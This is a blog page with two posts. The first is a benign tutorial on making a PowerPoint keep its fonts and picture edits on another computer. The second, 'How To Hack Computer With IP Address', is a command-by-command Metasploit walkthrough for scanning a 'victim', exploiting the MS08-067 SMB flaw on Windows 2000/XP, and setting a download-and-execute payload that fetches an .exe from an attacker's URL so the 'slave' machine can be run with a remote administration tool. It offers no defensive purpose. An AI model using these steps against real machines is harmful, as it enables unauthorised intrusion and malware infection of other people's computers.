Pages

Showing posts with label computer. Show all posts
Showing posts with label computer. Show all posts

Saturday, February 28, 2015

How to Get Your PowerPoint to Load on Another Computer Fonts Picture Modifications and All!

This weeks tutorial is one that a lot of people ask me about!  It can be so frustrating to make a PowerPoint on your computer at home, then head to your work computer and have all of your hard work with fancy fonts and giving pictures transparent backgrounds go to waste! 

I do want to forewarn you that this tutorial does NOT copy over videos or sound effects, so those will need to be reinserted.  It also does not copy over transitions, as it flattens all of the images.  Outside of those items though, the PowerPoint will look just as it does on the computer you created it on.

Now... onto the tutorial!




You can download this tutorial as a PDF by clicking this picture!
Note: This tutorial is hosted on Google Docs.  To save it from there, just open the file and click File > Download to save onto your computer!

As for next weeks poll, Ill add something that is super helpful - how to figure out which fonts are missing from an editable file that you downloaded!


Read more »

Wednesday, February 11, 2015

How To Hack Computer With IP Address

How To Hack Computer With IP Address
How To Hack Computer With IP Address
Requirements:

Nmap


Metasploit

First of all you need target IP of your victim.

Then open Metasploit Console & type db_create.


[Usage: This will create or connect you to a(your) database.]

Once you do that type Nmap.


[Usage: This will load Nmap in Metasploit Console]

Next you need to type db_nmap -sT -sV <target IP>


[This will scan OS, Ports, and Services running on the victims computer.]


Wait for 5 minutes to complete the scan.

Once done, Note down the OS, Ports, and Services running on the slaves computer.

Now its time to exploit the victims machine.


Exploit depends on the OS, Ports, and Services running on the slaves computer.


So, youre lucky if you get OS WIN XP or 2000 because its easy to exploit them.


No matter whether they are protected by a firewall or not.

Now:

Windows 2000 (all versions SP1, SP2, SP3, SP4)


Windows XP (all versions SP1, SP2, SP3)

Type show exploits


[Usage: This will show all the exploits in its database.]

Next you need to type use windows/smb/ms08_067_netapi


[Usage: This will select the exploit windows/smb/ms08_067_netapi]


Now Type show targets


[Usage: This will show all targets by exploit]



Now Type set target 0


[Usage: This will set target to 0 specified]


Then type show payloads


[Usage: This will bring up all the payloads]


Next type set payload windows/download_exec



[Usage: This will set the payload as windows/download_exec]



Then Type show options


[Usage: This will show all options in the exploit & payload]

In window you will see many options, in which you need to


Fill only two options RHOST & URL.

Type set RHOST <xxx.xxx.xxx.xxx >


[Usage: This will set RHOST (victims ip) to xxx.xxx.xxx.xxx]

Next Type set URL http://www.xxxx.com/xxx.exe


[Usage: This will set the URL to your direct server link.]

Finally you need to type exploit


[Usage: This will launch the exploit & your slave will be infected.]

You can now control your slave with a RAT. (Remote administration tool.)


So, any versions of Win 2000-XP can be exploited easily.

You can use the command db_autopwn –p –t –e.

In most cases you get a shell!

Now the final question - how to change the shellcode above to get access to someones 


Windows 7 or 8? 
Read more »